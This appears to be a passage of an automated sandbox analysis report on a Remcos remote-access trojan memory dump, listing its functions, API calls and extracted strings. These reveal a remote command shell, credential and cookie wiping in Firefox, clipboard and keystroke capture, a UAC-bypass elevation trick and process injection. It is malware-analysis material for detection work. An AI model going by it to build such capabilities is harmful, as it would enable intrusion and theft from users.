                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                • API String ID: 1067849700-181434739
                                • Opcode ID: 1ff92908fb735a07688bd7b3bf3bf23fdc0ca7871faa2f0198a6c16e2433a594
                                • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                • Opcode Fuzzy Hash: 1ff92908fb735a07688bd7b3bf3bf23fdc0ca7871faa2f0198a6c16e2433a594
                                • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 4cf14b19ad4f1a50ef4e69f7ada5f02e3acfdea048b49c70ac55160503c0ddf4
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 4cf14b19ad4f1a50ef4e69f7ada5f02e3acfdea048b49c70ac55160503c0ddf4
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32 ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-13974260
                                • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32 ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32 ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32 ref: 0041696C
                                • GlobalLock.KERNEL32 ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@
                                • API String ID: 3520204547-604454484
                                • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                • API String ID: 3756808967-1743721670
                                • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: 79deda2eaf5389e9881e5cc6274fd0cbf241d84606103934df9ee54e93fb00d6
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: 79deda2eaf5389e9881e5cc6274fd0cbf241d84606103934df9ee54e93fb00d6
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: 8SG$PXG$PXG$NG$PG
                                • API String ID: 341183262-3812160132
                                • Opcode ID: cb7bcd549964d34beac6a9ed48e4264662a834438446d80613bd2f371497bcfa
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: cb7bcd549964d34beac6a9ed48e4264662a834438446d80613bd2f371497bcfa
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: 31f50e56d7f4f7f2575dbc53f49883a4967628fc93eddf4b35ee6b86778a76ed
                                • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                • Opcode Fuzzy Hash: 31f50e56d7f4f7f2575dbc53f49883a4967628fc93eddf4b35ee6b86778a76ed
                                • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
